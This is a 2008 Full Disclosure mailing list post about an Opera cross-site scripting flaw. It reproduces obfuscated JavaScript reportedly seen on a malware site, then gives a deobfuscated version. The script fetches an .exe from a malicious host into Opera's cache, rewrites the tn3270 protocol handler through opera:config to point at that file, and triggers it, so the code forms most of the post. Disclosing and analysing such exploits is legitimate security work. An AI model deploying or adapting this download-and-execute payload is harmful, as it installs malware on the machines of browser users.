Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Opera Stored Cross Site Scripting

From: Kanedaaa Bohater <kaneda () bohater net>
Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST)


Just found a way to use Stefano's opera:config idea to execute code from
remote.


Hi.

3 months ago I found on some malware site
(www.google.com.update.login.jsp.podavanda.cn), that when Your UserAgent 
was Opera - they send to You code similar to Yours, but they first 
download malware .exe file to opera:cache (Opera use pre_downloading 
files) and later change tn3270:// protocol to this file (but without 
opera:historysearch). It was probably for older Opera version...


<script>
blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, ''));
blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, '');
blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), "dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, ''));
blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), "bLlPaPn@kL_Bi@f@rLaBm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, 
''));
document.appendChild(blank_iframe);
blank_iframe_window.eval
        ("config_iframe = document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\
        config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), 
"cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, ''));\
        cache_iframe = document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\
        app_iframe.src = "hUtUtUpY:y/y/UwUwYwU.@gYoyo@gYlye ()  UcyoXmY Xu@pXdYaytYeU.UlYoygXiyny.Uj@s@pX.@pXoXd () 
ayvYaynydXaY yc@ny/XI@I@lU/yxXlXoUaydUe@r@.ye@xyeX".replace(/[UXYy@]/g, '');\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, '');\
                cache_iframe.onload = function ()\
                {\
                        cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A 
HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 
4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes 
sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, ''), 
"tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\
                        app_link.click();\
                        setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, 
''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, ''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>


which was something like:

<script>
blank_iframe = document.createElement("iframe");
blank_iframe.src = "about:blank";
blank_iframe.setAttribute("style", "display:none");
blank_iframe.setAttribute("id"), "blank_iframe_window");
document.appendChild(blank_iframe);
blank_iframe_window.eval
        ("config_iframe = document.createElement("iframe");\
        config_iframe.setAttribute("id", "config_iframe_window");\
        config_iframe.src = 'opera:config';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement("script");\
        cache_iframe = document.createElement("iframe");\
        app_iframe.src = "hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\
        app_iframe.onload = function ()\
        {\
                cache_iframe.src = "opera:cache";\
                cache_iframe.onload = function ()\
                {\
                        cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                        var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A 
HREF=\"'+app_iframe.src.toUpperCase(), '');\
                        filename = cache.match(re);\
                        config_iframe_window.eval\
                        (\"\
                        opera.setPreference("Network","TN3270 App",opera.getPreference("User Prefs","Cache 
Directory4")+parent.filename[1]);\
                        app_link = document.createElement('a');\
                        app_link.setAttribute("href", "tn3270://nothing");\
                        app_link.click();\
                        setTimeout(function(){opera.setPreference("Network","TN3270 App","telnet.exe~")},1000);\
                        \");\
                };\
                document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);");
</script>

but unfortunately I dont have to much time for test...

-- 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member...     kaneda () bohater net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: